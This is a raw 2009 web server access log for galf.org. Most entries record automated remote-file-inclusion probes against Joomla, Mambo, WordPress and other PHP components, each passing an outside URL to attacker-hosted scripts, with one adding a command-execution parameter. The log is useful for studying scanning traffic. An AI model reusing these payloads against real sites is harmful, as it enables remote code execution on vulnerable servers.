77.222.40.247 - - [20/Sep/2009:19:48:08 -0700] "GET /logs/mambatstaff.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
77.222.40.247 - - [20/Sep/2009:19:50:10 -0700] "GET /logs/param.peoplebook.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:50:10 -0700] "GET /param.peoplebook.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:50:33 -0700] "GET /logs/param.peoplebook.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:51:53 -0700] "GET /logs/?option=com_lmo&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "galf.org"
77.222.40.247 - - [20/Sep/2009:19:51:53 -0700] "GET /?option=com_lmo&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "galf.org"
77.222.40.247 - - [20/Sep/2009:19:51:54 -0700] "GET /logs/?option=com_lmo&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:51:54 -0700] "GET /?option=com_lmo&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:36 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:36 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:36 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:36 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:38 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:38 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:40 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:40 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:40 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:42 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:43 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:53:44 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:54:15 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:54:15 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:54:15 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:19:54:16 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:56:51 -0700] "GET /admin.colophon.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:56:51 -0700] "GET /logs/admin.colophon.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:57:56 -0700] "GET /help.mmp.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:57:56 -0700] "GET /logs/help.mmp.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:59:44 -0700] "GET /?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:59:44 -0700] "GET /logs/?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
222.234.2.107 - - [20/Sep/2009:20:01:08 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:05:51 -0700] "GET /?option=com_loudmounth&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:05:51 -0700] "GET /logs/?option=com_loudmounth&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
74.6.8.91 - - [20/Sep/2009:20:06:00 -0700] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
77.222.40.247 - - [20/Sep/2009:20:06:39 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:06:39 -0700] "GET /admin.remository.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:06:43 -0700] "GET /?option=com_lmo&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:06:43 -0700] "GET /logs/?option=com_lmo&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
91.121.204.29 - - [20/Sep/2009:20:08:06 -0700] "GET /modules/xfsection/modify.php?dir_module=http://perso.ovh.net/~paypal/ct.txt?? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.galf.org"
91.121.204.29 - - [20/Sep/2009:20:08:06 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://perso.ovh.net/~paypal/ct.txt?? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.galf.org"
91.121.204.29 - - [20/Sep/2009:20:08:06 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://perso.ovh.net/~paypal/ct.txt?? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.galf.org"
222.234.2.107 - - [20/Sep/2009:20:08:27 -0700] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.234.2.107 - - [20/Sep/2009:20:08:28 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.234.2.107 - - [20/Sep/2009:20:08:28 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yestour.net/pass/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:10:17 -0700] "GET /uhp_config.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:10:33 -0700] "GET /?option=com_magazine&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:10:41 -0700] "GET /logs/?option=com_magazine&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:20:11:09 -0700] "GET /logs//skin/ggambo5210_music/setup.php?dir=http://www.4pppp.com/icon1.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:20:11:32 -0700] "GET /logs/access.log//skin/ggambo5210_music/setup.php?dir=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:20:11:32 -0700] "GET /logs//skin/ggambo5210_music/setup.php?dir=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:11:46 -0700] "GET /?option=com_log&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:11:46 -0700] "GET /logs/?option=com_log&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:20:12:36 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.142.221.158 - - [20/Sep/2009:20:12:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.142.221.158 - - [20/Sep/2009:20:12:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.172.38.225 - - [20/Sep/2009:20:13:58 -0700] "GET /war.php?vwar_root=http://saddogshirts.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:15:02 -0700] "GET /logs/?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:15:02 -0700] "GET /?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:20:16:55 -0700] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:20:16:55 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:20:16:55 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.234.2.107 - - [20/Sep/2009:20:17:07 -0700] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.142.245 - - [20/Sep/2009:20:17:17 -0700] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:17:50 -0700] "GET /admin.colophon.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:17:50 -0700] "GET /logs/admin.colophon.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:18:14 -0700] "GET /moodle.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:18:14 -0700] "GET /logs/moodle.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:19:30 -0700] "GET /logs/admin.colophon.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:20:34 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:20:34 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:22:35 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:22:51 -0700] "GET /help.mgm.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:22:51 -0700] "GET /logs/help.mgm.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:26:47 -0700] "GET /logs/configinsert.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:26:47 -0700] "GET /configinsert.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:27:17 -0700] "GET /?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
65.55.51.112 - - [20/Sep/2009:20:28:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:30:04 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:30:04 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:30:36 -0700] "GET /?config=1&base_datapath=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:30:36 -0700] "GET /logs/?config=1&base_datapath=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:31:26 -0700] "GET /?config=1&base_datapath=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:31:26 -0700] "GET /logs/?config=1&base_datapath=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:41:25 -0700] "GET /conf.pollxt.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:41:25 -0700] "GET /logs/conf.pollxt.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:20:42:38 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:20:42:38 -0700] "GET /logs/access_090420.log//modules/xfsection/modify.php?dir_module=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:20:42:38 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.4pppp.com/icon1.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:20:42:54 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:20:45:44 -0700] "GET /?path%5Bdocroot%5D=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:20:45:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:20:45:53 -0700] "GET /logs/access_090420.log%20%20//?path%5Bdocroot%5D=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:20:49:54 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:20:49:58 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:20:49:58 -0700] "GET /logs/access_090420.log//modules/xfsection/modify.php?dir_module=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.182 - - [20/Sep/2009:20:50:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.182 - - [20/Sep/2009:20:50:03 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:20:50:08 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:20:50:08 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
